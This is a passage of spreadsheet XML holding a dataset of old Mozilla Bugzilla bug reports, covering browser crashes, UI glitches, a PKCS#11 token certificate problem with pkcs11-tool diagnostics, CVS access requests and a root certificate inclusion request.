sisweb@ucdavis.edu is the contact info</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-481710</t>
  </si>
  <si>
    <t>Talos reboots (20090305 edition)</t>
  </si>
  <si>
    <t>qm-plinux-trunk01
qm-mini-ubuntu03</t>
  </si>
  <si>
    <t>NSS-434099</t>
  </si>
  <si>
    <t>NSS relies on unchecked PKCS#11 object attribute values</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9b5) Gecko/2008032620 Firefox/3.0b5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9b5) Gecko/2008032620 Firefox/3.0b5
Actually I don't know if I chose the correct Product/Component.
I have an USB Token (iKey 2032). It works with MS Cripto API but I can't make it work with Firefox or Thunderbird (2.0.0.14 and Trunk). The Token has a PKCS#11 module (API 2.01). The module is dkck201.dll.
I can load the module and login correctly. But I can't see the 3 certs inside it (only 2). The second cert is duplicated (view attachment). When I try to configure an account to use certificates I raise an strange error (view attachment). That's it.
Reproducible: Always
Steps to Reproduce:
1. Load an iKey 2032 USB Token using its PKCS#11 module (dkck201.dll)
2. View the certificates in the Certificate Manager. I have 3 unique certs but TB shows 3 certs (1 duplicated). View the attachments.
3. I cannot set any cert for my account. View the attachments for the error dialog.
Actual Results:  
I cannot use certs with my Token with Thunderbird.
Expected Results:  
Just work. -)
I discovered the OpenSC site and I made some tests. Here it goes.
C:\&gt;pkcs11-tool.exe --module c:\Windows\system32\dkck201.dll --show-info
Cryptoki version 2.1
Manufacturer     Copyright (c) SafeNet Inc.
Library          SafeNet Cryptoki DLL V-2.01 (ver 7.0)
C:\&gt;pkcs11-tool.exe --module c:\Windows\system32\dkck201.dll --list-slots
Available slots:
Slot 10          Rainbow Technologies iKeyVirtualReader 0
  token state:   uninitialized
Slot 11          (empty)
Slot 12          (empty)
Slot 13          (empty)
C:\&gt;pkcs11-tool.exe --module c:\Windows\system32\dkck201.dll --list-mechanisms
Supported mechanisms:
  RSA-PKCS sign verify wrap unwrap encrypt decrypt other flags=0x25000
  SHA1-RSA-PKCS sign verify
  RSA-PKCS-KEY-PAIR-GEN keypairgen
  MD2 digest
  MD5 digest
  SHA-1 digest
  SHA256 digest
  DSA-KEY-PAIR-GEN keypairgen
  DSA sign verify
  RC2-KEY-GEN other flags=0x8000
  RC2-ECB wrap unwrap encrypt decrypt other flags=0x20000
  RC2-CBC encrypt decrypt
  RC2-MAC sign verify
  RC4-KEY-GEN other flags=0x8000
  RC4 encrypt decrypt
  DES-MAC sign verify
  DES3-MAC sign verify
  DES-KEY-GEN other flags=0x8000
  DES-ECB wrap unwrap encrypt decrypt other flags=0x20000
  DES-CBC encrypt decrypt
  DES2-KEY-GEN other flags=0x8000
  DES3-KEY-GEN other flags=0x8000
  DES3-ECB wrap unwrap encrypt decrypt other flags=0x20000
  DES3-CBC encrypt decrypt
  DH-PKCS-KEY-PAIR-GEN keypairgen
  DH-PKCS-DERIVE other flags=0x80000
C:\&gt;pkcs11-tool.exe --module c:\Windows\system32\dkck201.dll --list-objects
Public Key Object RSA 2048 bits
  label:      Comodo_IEAv
  ID:         63f3afb9bee9f557572c9722efbb4bc9277a8e34
  Usage:      encrypt verify wrap
Certificate Object type = X.509 cert
  label:      Comodo_IEAv
  ID:         63f3afb9bee9f557572c9722efbb4bc9277a8e34
Public Key Object RSA 1024 bits
  label:      Certisign
  ID:         342b8df0abafd88ad7ba1473ebbdba3611b71259
  Usage:      encrypt verify wrap
Certificate Object type = X.509 cert
  label:      Certisign
  ID:         342b8df0abafd88ad7ba1473ebbdba3611b71259
Public Key Object RSA 2048 bits
  label:      Comodo_Maranhao.us
  ID:         7790656d2d528fbf15256058f6864290be2bc920
  Usage:      encrypt verify wrap
Certificate Object type = X.509 cert
  label:      Comodo_Maranhao.us
  ID:         7790656d2d528fbf15256058f6864290be2bc920
Using the following command I can extract the 3 certificates:
pkcs11-tool.exe --module c:\Windows\system32\dkck201.dll --read-object --type=cert --label=XXXXXXX --output-file=XXXXXXX
The following test does not work:
C:\&gt;pkcs11-tool.exe --module c:\Windows\system32\dkck201.dll --pin=XXXXXXXXXX --test
C_SeedRandom() and C_GenerateRandom():
  seems to be OK
Digests:
  all 4 digest functions seem to work
  MD5: OK
  SHA-1: OK
Signatures (currently only RSA signatures)
  testing key 0 (Comodo_IEAv)
error: PKCS11 function C_SignUpdate failed: rv = CKR_MECHANISM_INVALID (0x70)
Aborting.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-362566</t>
  </si>
  <si>
    <t>Outdated Ask.com search plugin that has distorted icon and still has old title AskJeeves</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux rv:1.8.1) Gecko/20061010 Firefox/2.0
Build Identifier: Mozilla/5.0 (X11 U Linux rv:1.8.1) Gecko/20061010 Firefox/2.0
I clicked Manage Search Engines... from the seach plugin drop-down box then Get more search engines.... I installed the Ask.com search from the resulting page https://addons.mozilla.org/search-engines.php. When I then selected the installed plugin the logo in the search bar became distorted and ugly. Also the search was previously called AskJeeves and the plugin still bears that title. There is an updated plugin available from the Mycroft project.
Reproducible: Always
Steps to Reproduce:
1. Install Ask.com search plugin from addons.mozilla.org.
2. Select the plugin from the drop-down list beside the search bar.
3. Also look the name in the drop-down list.
Actual Results:  
The Ask.com logo begomes stretched. The plugin has the old name of the site (AskJeeves). Searching works though and the search plugins page has the correct title Ask.com.
Expected Results:  
Logo remains good looking. Plugin should be called Ask.com.
New plugin that works with Firefox 2.0 can be found here:
http://mycroft.mozdev.org/download.html?name=Ask.com&amp;sherlock=yes&amp;opensearch=yes</t>
  </si>
  <si>
    <t>master_pumpkin_</t>
  </si>
  <si>
    <t>CORE-159358</t>
  </si>
  <si>
    <t>print or print-preview crash when processing a 2 pages table with thead and border-collapse: collapse [@ nsVoidArray::ElementAt ]</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.1b) Gecko/20020725
BuildID:    2002072504
When trying to print or preview an html page with a 2 or more pages table
with a  element Mozilla 1.1 crashes. It doesn't append with Mozilla 1.0
Reproducible: Always
Steps to Reproduce:
1. Open the html page
2. Go to print preview
3. Click on the next page button
or
1. Open the html page
2. Go to print
3. Print the page
Actual Results:  Crash
Expected Results:  Print or preview</t>
  </si>
  <si>
    <t>gbescond</t>
  </si>
  <si>
    <t>SEAMONKEY-521756</t>
  </si>
  <si>
    <t>Uncaught Exception NS_ERROR_FAILURE  JS frame :: chrome://navigator/content/tabbrowser.xml :: line 2364</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1.5pre) Gecko/20091011 Lightning/1.0pre SeaMonkey/2.0pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1.5pre) Gecko/20091011 Lightning/1.0pre SeaMonkey/2.0pre AND Mozilla/5.0 (X11 U Linux i686 de rv:1.9.1.5pre) Gecko/20091008 Lightning/1.0pre SeaMonkey/2.0pre
Closing the MailNews window throws an uncaught exception even in new profile.
Reproducible: Always
Steps to Reproduce:
1. Close the MailNews window
Actual Results:  
Error console shows:
Error: uncaught exception: [Exception... Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIObserverService.removeObserver]  nsresult: 0x80004005 (NS_ERROR_FAILURE)  location: JS frame :: chrome://navigator/content/tabbrowser.xml ::  :: line 2364  data: no]</t>
  </si>
  <si>
    <t>hb</t>
  </si>
  <si>
    <t>FIREFOX-396998</t>
  </si>
  <si>
    <t>Memory leak/crash in trunk @ cisco.com</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)
The Url stopped loading as of Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a8pre) Gecko/2007092004  and Windows XP too...
http://forums.mozillazine.org/viewtopic.php?p=3065497#3065497
The site doesn't load and memory usage climbs and climbs.
Reproducible: Always
Steps to Reproduce:
1.Load URL.
2.
3.
Windows XP also...
http://forums.mozillazine.org/viewtopic.php?p=3065497#3065497</t>
  </si>
  <si>
    <t>hsumen</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-294722</t>
  </si>
  <si>
    <t>Renovate roadmap entry/discovery points to be clear useful and future-proof</t>
  </si>
  <si>
    <t>/roadmap/index.html isn't serving any useful purpose at the moment since it's
just linking to old roadmaps and the FAQ -- which the main roadmap does anyway.
It would make more sense for roadmap.html to be in its place so everything
roadmap is in the /roadmap/ folder. Therefore I propose:
   - justdave nukes /roadmap/index.html and moves roadmap.html (with CVS history)
     to replace it
   - I fix the links set up a redirect and remove /roadmap.html</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-249447</t>
  </si>
  <si>
    <t>The Mozilla Update site does not use a consistent look and feel</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040608 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040608 Firefox/0.8
The Mozilla Update site's look and feel is very different from the rest of the
Mozilla site.  This is an extension of the disparate branding that Steve Garrity
identified in his Branding Mozilla: Toward Mozilla 2.0
(http://actsofvolition.com/steven/mozillabranding/) and should be corrected for
many of the same reasons.
Reproducible: Always
Steps to Reproduce:
NA
Actual Results:  
NA
Expected Results:  
At the least the same typography and color scheme as the rest of the site.</t>
  </si>
  <si>
    <t>kadams</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-445884</t>
  </si>
  <si>
    <t>mozilla-central  account</t>
  </si>
  <si>
    <t>I need write access to mozilla-central to land #430581 .
I have cvs access per #274496 .</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-438950</t>
  </si>
  <si>
    <t>Clone production-prometheus-vm for secondary 1.8 build machine</t>
  </si>
  <si>
    <t>This should be a clone of production-prometheus-vm.
This can go on slower sata disks.</t>
  </si>
  <si>
    <t>CORE-408749</t>
  </si>
  <si>
    <t>ASSERTION: A block's child's next in flow's parent must be a block with -moz-column table stuff</t>
  </si>
  <si>
    <t>Loading the testcase triggers:
###!!! ASSERTION: A block's child's next in flow's parent must be a block!: 'nifBlock-&gt;GetType() == nsGkAtoms::blockFrame || nifBlock-&gt;GetType() == nsGkAtoms::areaFrame' file /Users/jruderman/trunk/mozilla/layout/generic/nsBlockFrame.cpp line 3104</t>
  </si>
  <si>
    <t>CORE-34466</t>
  </si>
  <si>
    <t>invisible views are painted</t>
  </si>
  <si>
    <t>When selecting text with paintflash on area where Edit-&gt;Copy menuitem
should be flashes. This happend even that menuitem is not shown
on screen (menu is not drop down).
Things to reproduce:
First open Edit menu and close it. Then put paint flashing on and select some
text from mozilla. You see that selection flashes and then flashes area below
edit menu just where 'Copy' menuitem should be. 
This same happens for 'Go' menu items 'Forward' and 'Back' when clickin on
back/forward buttons but that is bit harder to see.
I have small patch that fixes this but i am not sure is this checking
for visibility at right place?</t>
  </si>
  <si>
    <t>tomi.leppikangas</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-134877</t>
  </si>
  <si>
    <t>left over when using a recycled window</t>
  </si>
  <si>
    <t>2002040103
It seems that the mail message windows are being reused.
I several time have seen things left behind in a newly opened message window.
Steps to reproduce:
1. Open a web page
2. Mail it as an attachment
3. Press New Message
4. You might see leftover text/attachments in the newly opened message window.
Somewhat related to this is that it is visually annoying when the previous
mailing addresses are being cleaned from the newly opened window (especially
when there were several of them listed).</t>
  </si>
  <si>
    <t>gabor.liptak</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-508431</t>
  </si>
  <si>
    <t>Run sql in bug 468461 on support-stage for testing</t>
  </si>
  <si>
    <t>https://bug468461.bugzilla.mozilla.org/attachment.cgi?id=384022</t>
  </si>
  <si>
    <t>DEVTOOLS-700639</t>
  </si>
  <si>
    <t>Make the script debugger UI look right on RTL</t>
  </si>
  <si>
    <t>Setting the configuration property intl.uidirection.en to rtl has no effect on the script debugger. However the rest of the browser chrome is instantly altered and so is the style inspector highlighter HTML panel etc. The debugger should behave appropriately in RTL locales.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-126451</t>
  </si>
  <si>
    <t>CVS check-in access for Nivedita Dixit (nivedita@netscape.com)</t>
  </si>
  <si>
    <t>Nivedita Dixit(nivedita@netscape.com) is an employee of netscape working in
Bangalore India. She started working on the Netscape Client few months ago. 
She has already started contributing bug fixes(patches) into bugzilla. I am the
contact for her in Mountain View CA. Pavlov Gagan Nisheeth Chris Saari and
brendan have looked at her patches for bug fixes or worked with her in debugging
problems. I'd like to get her CVS check-in access to check-in bug fixes into
Mozilla Client CVS Source. Let me know what I need to do to get her CVS check-in
access. Chofmann Brendan should be able to acknowledge the request.
Thanks.
Nivedita: Can you add the list of bugs that you have already resolved(including
the bugs which has the patches) ?</t>
  </si>
  <si>
    <t>namachi</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-362874</t>
  </si>
  <si>
    <t>Add he ka ku locales to shipped-locales</t>
  </si>
  <si>
    <t>Axel Hecht requests that we release he and says that we need to also add ka (Georgian) and ku as betas.</t>
  </si>
  <si>
    <t>tfullhart</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-46579</t>
  </si>
  <si>
    <t>CVS Blame and CVS Log are broken</t>
  </si>
  <si>
    <t>If I click on the CVS Log or CVS BLame links on the following LXR page I 
get an error:
    http://lxr.mozilla.org/seamonkey/source/layout/html/base/src/nsTextFrame.cpp
Here's the error I get in the browser:
    Content-type: text/html 
    Software error:
    Unexpected EOF at cvsblame.pl line 152  chunk 19951. 
    Please send mail to this site's webmaster for help.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-69680</t>
  </si>
  <si>
    <t>Reducing duplicate entries</t>
  </si>
  <si>
    <t>The search for bugs -by default- does not show closed bugs that appear in
currently released milestone. On the other hand - there amount of the bugs with
closed is so huge that with them it becomes hard to find the proper one.
For the type of project like Moz. I miss in the search option (and maybe could
be added as additional staus in the bug-life) like closed/resolved however
verified in latest milestone and out somewhere in the wild public with the
milestone release...
This could help to reduce the duplicate entries and still be quicker and better
than using date-based search or target limits.</t>
  </si>
  <si>
    <t>lizal</t>
  </si>
  <si>
    <t>CORE-98686</t>
  </si>
  <si>
    <t>Table celldata code isn't cool enough for 64bit platforms.</t>
  </si>
  <si>
    <t>The bit twiddling code in celldata.h sucks extended word rocks.
The union of mOrigCell and mBits doesn't line up on 64bit platforms.
The problem is that the padding isn't right since you are using a pointer and a 
32bit int.. blah blah blah..
you end up with:
[      64bit pointer     ]
[ 32bit int ][ 32bit pad ]
so when you assign the pointer value you end up filling up the padding before 
you touch the int.. then you ask for the int and it laughs at you.
don't forget %sp + 0x7ff</t>
  </si>
  <si>
    <t>NSS-499712</t>
  </si>
  <si>
    <t>Add Buypass Class 2 CA 1 and Buypass Class 3 CA 1 certificates to NSS</t>
  </si>
  <si>
    <t>This bug requests inclusion in the NSS root certificate store of the following
certificates owned by Buypass.
Friendly name:  Buypass Class 2 CA 1
Certificate location: 
https://bugzilla.mozilla.org/attachment.cgi?id=361508
(will also attach)
SHA1 Fingerprint: 
a0:a1:ab:90:c9:fc:84:7b:3b:12:61:e8:97:7d:5f:d3:22:61:d3:cc
Trust flags:  SSL
Test URL:  
https://domain.ssl.buypass.no/ssl/domain/
--
Friendly name: Buypass Class 3 CA 1
Certificate location: 
https://bugzilla.mozilla.org/attachment.cgi?id=361508
(will also attach)
SHA1 Fingerprint: 
61:57:3a:11:df:0e:d8:7e:d5:92:65:22:ea:d0:56:d7:44:b3:23:71
Trust flags:  SSL
Test URL:  
https://evident.ssl.buypass.no/ssl/evident/
This CA has been assessed in accordance with the Mozilla project guidelines
and the root certificates have been approved for inclusion in bug 477028.
The next steps are as follows:
1) A representative of the CA must confirm that all the data in this bug is
correct and that the correct certificate(s) have been attached. They must also
specify what OS they would like to use to perform the verification below.
2) A Mozilla representative creates a test build of NSS with the new
certificate(s) and attaches nssckbi.dll to this bug. A representative of the
CA must download this drop it into a copy of Firefox and/or Thunderbird on the
OS in question and confirm (by adding a comment here) that the certificate(s)
have been correctly imported and that websites work correctly.
3) The Mozilla representative checks the certificate(s) into the NSS store and
marks the bug RESOLVED FIXED.
4) At some time after that various Mozilla products will move to using a
version of NSS which contains the certificate. This process is mostly under the
control of the release drivers for those products.</t>
  </si>
  <si>
    <t>CORE-422769</t>
  </si>
  <si>
    <t>reduce narrow windows API calls in accessibility</t>
  </si>
  <si>
    <t>Created attachment 309214
directy from other patch on bug418703</t>
  </si>
  <si>
    <t>CORE-497580</t>
  </si>
  <si>
    <t>[HTML5] Make the HTML5 parser compile under Windows CE</t>
  </si>
  <si>
    <t>At least it seems that 'constant' is a reserved word.</t>
  </si>
  <si>
    <t>SEAMONKEY-119876</t>
  </si>
  <si>
    <t>#Icon error in navigator.xul</t>
  </si>
  <si>
    <t xml:space="preserve">I found a small error in navigator.xul...
Ben and David care to r/sr?
Index: mozilla/xpfe/browser/resources/content/navigator.xul
===================================================================
RCS file: /cvsroot/mozilla/xpfe/browser/resources/content/navigator.xulv
retrieving revision 1.357
diff -w -u -4 -r1.357 navigator.xul
--- mozilla/xpfe/browser/resources/content/navigator.xul	5 Jan 2002 00:15:38 -0000	1.357
+++ mozilla/xpfe/browser/resources/content/navigator.xul	14 Jan 2002 11:35:15 -0000
@@ -3359 +3359 @@
               &lt;menu class=menu-iconic bookmark-item uri=rdf:*
-                    image=rdf:http://home.netscape.com/NC-rdf#Icon
+                    src=rdf:http://home.netscape.com/NC-rdf#Icon
                     validate=never
                     label=rdf:http://home.netscape.com/NC-rdf#Name&gt;
               </t>
  </si>
  <si>
    <t>CORE-160550</t>
  </si>
  <si>
    <t>[FIXr][RFE] Implement CSS3 Color module's hsl() and hsla() color types</t>
  </si>
  <si>
    <t>The CSS3 color module (currently in last call working draft) implements an hsl()
color value:
http://www.w3.org/TR/2002/WD-css3-color-20020418/#hsl-color
which is trivial to convert to rgb().
It also specifies an hsla() color value:
http://www.w3.org/TR/2002/WD-css3-color-20020418/#hsla-color
which is simply hsl() with an alpha channel.
Since CSS color values are converted to rgb() format with the addition of the
alpha channel it seems that they should be converted to rgba() instead in which
case this RFE would be dependent on
http://bugzilla.mozilla.org/show_bug.cgi?id=147017 (Support rgba colors in CSS).
Since the specs are still in working draft the values would have to be
implemented as -moz-hsl() and -moz-hsla() but nonetheless this is still an
incredibly powerful design ability. hsl() is much better for guessing and
checking values (makes it easier for the web page designers or to quickly find
matching colors for XUL skins for example) and an alpha channel makes it much
more convenient than having to create a 1*1 PNG image for each different background.</t>
  </si>
  <si>
    <t>jasonkarldavis</t>
  </si>
  <si>
    <t>CORE-289910</t>
  </si>
  <si>
    <t>Painted stroke not invalidated for mouseover mouseout changes</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.6) Gecko/20050317 Firefox/1.0.2
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050408 Firefox/1.0+
Hover over the the line in http://jeffrafter.com/SVG/tests/stroke.svg and notice
that the cyan stroke is left behind. In
http://jeffrafter.com/SVG/tests/stroke2.svg no events fire.
Reproducible: Always
Steps to Reproduce:
1. Go to page
2. Hover over red line
3. Hover off
Actual Results:  
Cyan border is left over
Expected Results:  
Erased the cyan border</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-463035</t>
  </si>
  <si>
    <t>Minefield default start page: last 48 hours of checkins link should link to hg pushlog</t>
  </si>
  <si>
    <t>The default startpage has a useful links section - one of the links is labelled last 48 hours of checkins.
Currently this links to a bonsai CVS query.
With current trunk development now on mozilla-central it would be more relevant to link to the hg pushlog
http://hg.mozilla.org/mozilla-central/pushloghtml?startdate=48+hours+ago&amp;enddate=now</t>
  </si>
  <si>
    <t>CALENDAR-202368</t>
  </si>
  <si>
    <t>direct typing</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3) Gecko/20030312
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3) Gecko/20030312
One of the best features that can be introduced is typing directly on the view
page without opening the New Event box.  
This is one feature of outlook which everybody misses since now our company have
completely shifted from outlook to Mozilla.
Regards
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>edward.lobo</t>
  </si>
  <si>
    <t>CORE-332939</t>
  </si>
  <si>
    <t>[regression] Printing fails: once past the print set up page the progress box sits idle</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a1) Gecko/20060405 Camino/1.2+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a1) Gecko/20060405 Camino/1.2+
The print dialogue box loads correctly but once pressing 'preview' 'print to PDF' or 'Print' a progress bar pops up but sits idle. Hitting 'cancel' has no effect.
Only solution is to force quit the browser.
Reproducible: Always
Steps to Reproduce:
1. Load page
2. File menu &gt; Print window comes up correctly
3. 'Print' or 'preview' or select a PDF option
Actual Results:  
progress window idle. Hitting cancel has no effect.
Expected Results:  
Print the document</t>
  </si>
  <si>
    <t>SEAMONKEY-189430</t>
  </si>
  <si>
    <t>In  Warning: reference to undefined property window.arguments[2]</t>
  </si>
  <si>
    <t>Warning: reference to undefined property window.arguments[2]
Source File: chrome://messenger/content/msgMail3PaneWindow.js
Line: 634
seems to happen when you double click on a newsgroup server so that you have two
open mail windows
20030116</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-358740</t>
  </si>
  <si>
    <t>L10n coverage testing extension</t>
  </si>
  <si>
    <t>I'm working on an extension to automatically test the (Firefox) user interface.
The current state of art is that it tests the menubar the prefwindow and the neterror pages.
This is mostly just assuring that no xml parse errors pop up at runtime.
A short description is on the wiki I'll clean up the code some more and submit a patch for review.
Candidate location would be testing/tests/l10n/extensions/coverage.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-388031</t>
  </si>
  <si>
    <t>Updates to the mk transaltion in Mozilla products for 2.0.0.6</t>
  </si>
  <si>
    <t>We have organizied a massive bug hount in Mozilla products this several past weeks and also consolidated some terms used in other projects.
So this is the result ... attached are patches for Firefox (browser.diff) Thunderbird (mail-editor.diff) Toolkit (toolkit.diff) and security dom and other-licenses (other.diff)</t>
  </si>
  <si>
    <t>BUGZILLA-186689</t>
  </si>
  <si>
    <t>Should be able to set all/clear all email options in preferences</t>
  </si>
  <si>
    <t>I have two bugzilla accounts:  one for work and one for home.  When I am not
working I want to completely disable e-mail for my work account.  When I am
working I want to re-enable it again.  Currently I have to click (or unclick)
each option.  
There should be a two extra buttons under Field/recipient specific options:. 
One should be labeled Set all and the other should be labeled Clear all</t>
  </si>
  <si>
    <t>mozilla-linux</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-479245</t>
  </si>
  <si>
    <t>Add CNAME entry for ru.start3.mozilla.com</t>
  </si>
  <si>
    <t>To support the change to Yandex as the default start page for the Russian locale in bug 471561 ru.start3.mozilla.com should have a CNAME entry pointing at firefox.yandex.ru. 
Please add this entry to the start3.mozilla.com (or mozilla.com as appropriate) zone file.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-209545</t>
  </si>
  <si>
    <t>use XPIDL for nsImapMiscellaneousSink and nsImapExtensionSink</t>
  </si>
  <si>
    <t>nsImapMiscellaneousSink and nsImapExtensionSink use a hand-rolled proxy
mechanism. We should get rid of this mechanism and just use xpidl.</t>
  </si>
  <si>
    <t>NSPR-63273</t>
  </si>
  <si>
    <t>PR_Assert should be defined in optimized builds.</t>
  </si>
  <si>
    <t>PR_Assert is now only defined in debug builds.
This makes it impossible for people to replace
a debug build of NSPR by an optimized build
because PR_Assert will be unresolved.
PR_Assert should also be defined in optimized
builds so that debug and optimized builds export
the same interface.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-330468</t>
  </si>
  <si>
    <t>Extension pages on https://addons.mozilla.org have stopped updating as of March 13 2006</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
The public extension pages are no longer updating.  This means new releases aren't showing up updated developer comments are still showing the old comments and new posted comments aren't being displayed.  This started occuring some time on March 13 2006.
Example 1: My extension had an accepted 0.9.8 release yesterday and the developer page shows 0.9.8 as released but the public page still shows 0.9.7 as the current release.  It also does not display my updating developer comments.
https://addons.mozilla.org/developers/itemoverview.php?id=1264
Example 2: The neweset extension page ( https://addons.mozilla.org/extensions/showlist.php?application=firefox&amp;category=Newest ) shows a brand new extension (Extension Manager Extended 2.1) as being released yesterday but going to that extension's public page says it does not exist.
https://addons.mozilla.org/extensions/moreinfo.php?id=2195
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>CORE-342490</t>
  </si>
  <si>
    <t>window.navigator isn't really readonly</t>
  </si>
  <si>
    <t>In nsIDOMWindowInternal.idl we have:
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/dom/public/idl/base/nsIDOMWindowInternal.idl&amp;rev=1.32&amp;root=/cvsroot&amp;mark=54#54
However XPConnect always asks the scriptable helpers to resolve a property before falling back onto asking the set if the property exists. As a result we fall into this code in nsDOMClassInfo.cpp:
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/dom/src/base/nsDOMClassInfo.cpp&amp;rev=1.393&amp;root=/cvsroot&amp;mark=6289-6291#6276
and since we resolve it there we never ask the IDL about the property and we lose. I'm not sure why we have the DOMClassInfo code there at all (why don't we just resolve the navigator property in from the IDL?) but if there is a need for it then I think we should use JSPROP_READONLY and JSPROP_PERMANENT for it.</t>
  </si>
  <si>
    <t>SEAMONKEY-328317</t>
  </si>
  <si>
    <t>merge platform .jar files into en-US.jar</t>
  </si>
  <si>
    <t>We should do what bug 102509 comment #25 proposes and Firefox/Thunderbird have done already: merging the platform .jar files into the main language .jar file.
Along with bug 325473 this is needed for the source L10n stuff of bug 286110 where we'll end up having a single @ab-CD@.jar in the end.
I'm currently working on a patch. The main stuff is easy the trickier parts are the needed changes so that chrome registry gets the correct new locations set.
This mainly needs the langenus.jst file to register the new location (which is straight forward) but also installed-chrome.txt getting written correctly at build time which is tricky and done by make-jars.pl mainly see http://lxr.mozilla.org/mozilla/search?string=foreignPlatformFile
I guess I'll need to add an additional check for a foreign platform path instead of just a foreignPlatformFile (which we don't have any more) as we do now. That means we'll omit writing anything with |-platform//| in the path from writing to installed-chrome.txt (just as we do with |-| in the file name at the moment).</t>
  </si>
  <si>
    <t>CORE-182282</t>
  </si>
  <si>
    <t>problem with content generated by javascript and after accessing it by getElementById function</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.2) Gecko/20021126
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.2) Gecko/20021126
In an html page there is a script that generate content with the javascript
function document.write. This content is a DIV with id 'square' and class 'red'
which define a red border.
First problem this DIV have no class. it's present in the DOM tree (i can view
it with the dom inspector) but with no attribute (no class no id ...).
So after it's not possible to acces it with a document.getElementById(square).
This script was working on Mozilla 1.2b
Reproducible: Always
Steps to Reproduce:
1.try the script with 1.2 and 1.2b :)
Actual Results:  
with 1.2 div 'square' have not border
with 1.2b div 'square' has his border
Expected Results:  
red border in any version :)</t>
  </si>
  <si>
    <t>barliguy</t>
  </si>
  <si>
    <t>CORE-299084</t>
  </si>
  <si>
    <t>cleanup nsBaseDragService::GetFrameFromNode()</t>
  </si>
  <si>
    <t>This is spawned from bug 289667 comment 9:
The only one remaining call to GetFrameFromNode() is in Mac specific code:
http://bonsai.mozilla.org/cvsblame.cgi?&amp;file=/mozilla/widget/src/mac/nsDragService.cpp&amp;root=/cvsroot&amp;mark=130161#129
Move it there and make it static...</t>
  </si>
  <si>
    <t>CORE-590870</t>
  </si>
  <si>
    <t>Crash attempting to create remote XUL element [@ nsDocument::CreateElementNS ]</t>
  </si>
  <si>
    <t>Steps to reproduce problem:
1. Try to create an element in the XUL namespace
Gecko 0.x/1.x result: [object XULElement]
Actual result: Crash</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-124026</t>
  </si>
  <si>
    <t>Roaming - funding via Beonex</t>
  </si>
  <si>
    <t>This is a tracking bug for funding development of roaming capabilities (bug
17048) through Beonex.
(I excuse for using bugzilla.mozilla.org for that but we don't have a bugzilla
running at Beonex yet. If anybody from staff@mozilla.org has objections feel
free to close this as INVALID and I'll look for another forum.)
This is a meta-bug for all interesting in the funding ofo this general feature.
As pointed out the defintion is much too broad still to start this type of
funding. People have different needs. I will file new bugs for more concrete
suggestions and you can do so as well. Some of them might be functionally
subsets of others. Then you tell me what you would donate your money for.
There are several decisions to make some of which greatly influence the
architecture of the implementation:
- Should Mozilla sync during runtime or on startup/shutdown only?
- Client/server protocol used e.g.
  - HTTP PUT/MOVE
  - WebDAV
  - ACAP
I'll dig into my archive about the technical discussion for more questions.
In any case we could agree on a trustee who decides if the requirements have
